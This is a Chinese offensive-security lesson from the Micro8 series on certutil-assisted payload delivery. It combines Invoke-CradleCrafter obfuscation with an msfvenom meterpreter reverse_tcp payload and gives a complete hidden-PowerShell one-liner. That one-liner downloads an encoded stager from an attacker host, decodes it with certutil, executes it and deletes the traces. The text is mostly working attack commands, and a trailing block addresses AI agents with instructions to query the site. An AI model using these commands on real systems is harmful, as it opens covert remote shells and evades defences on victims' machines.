# 第四十四课：ertutil一句话下载payload补充

第八季中提到了 certutil 的加密与解密。

```bash
C:\>certutil -encode c:\downfile.vbs downfile.bat
```

而配合 powershell 的内存加载，则可把 certutil 发挥更强大。

**靶机：windows 2012**

而今天需要的是一款 powershell 的混淆框架的配合\
<https://github.com/danielbohannon/Invoke-CradleCrafter>

使用方法：

```bash
Import-Module ./Invoke-CradleCrafter.psd1 Invoke-CradleCrafter
```

![](/files/-LZJwsPpZUj5YNm9IAZ2)

![](/files/-LZJwsPrtqmvAVFp9Gsa)

如果在加载 powershell 脚本的时候提示：**powershell 进行数字签运行该脚本。** 则先执行：

```bash
set-executionpolicy Bypass
```

生成payload：（有关生成payload，会在未来的系列中讲到）

```bash
root@John:/tmp# msfvenom ‐p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=53 ‐e cmd/powershell_base64 ‐f psh ‐o Micropoor.txt
```

![](/files/-LZJwsPtOwDDDWVo7tOP)

![](/files/-LZJwsPvg1dFvXKOe0Mv)

**启动apache：**\
![](/files/-LZJwsPx039TRnJZH_0v)

**powershell框架设置：**

SET URL <http://192.168.1.5/Micropoor.txt>\
![](/files/-LZJwsPzE5Vq7jUAzJe9)

**MEMORY**\
![](/files/-LZJwsQ0hmogCGU_ZSFl)

**CERTUTIL**\
![](/files/-LZJwsQ2LN6YM_7uJ1J1)

**ALL**\
![](/files/-LZJwsQ4BqYFKQhF1bvD)

**1**\
![](/files/-LZJwsQ6snDobc5LO3Oj)

**混淆内容保存txt，后进行encode**\
![](/files/-LZJwsQ8yOlLQ60HeJ_g)

把 cer.cer 与 Micropoo.txt 放置同一目录下。

**目标机执行：**

```bash
powershell.exe ‐Win hiddeN ‐Exec ByPasS add‐content ‐path %APPDATA%\\cer.cer (New‐Object Net.WebClient).DownloadString('http://192.168.1.5/cer.cer'); certutil ‐decode %APPDATA%\cer.cer %APPDATA%\stage.ps1 & start /b cmd /c powershell.exe ‐Exec Bypass ‐NoExit ‐File %APPDATA%\stage.ps1 & start /b cmd /c del %APPDATA%\cer.cer
```

> Micropoor


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://micro8.gitbook.io/micro8/contents-1/41-50/44ertutil-yi-ju-hua-xia-zai-payload-bu-chong.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.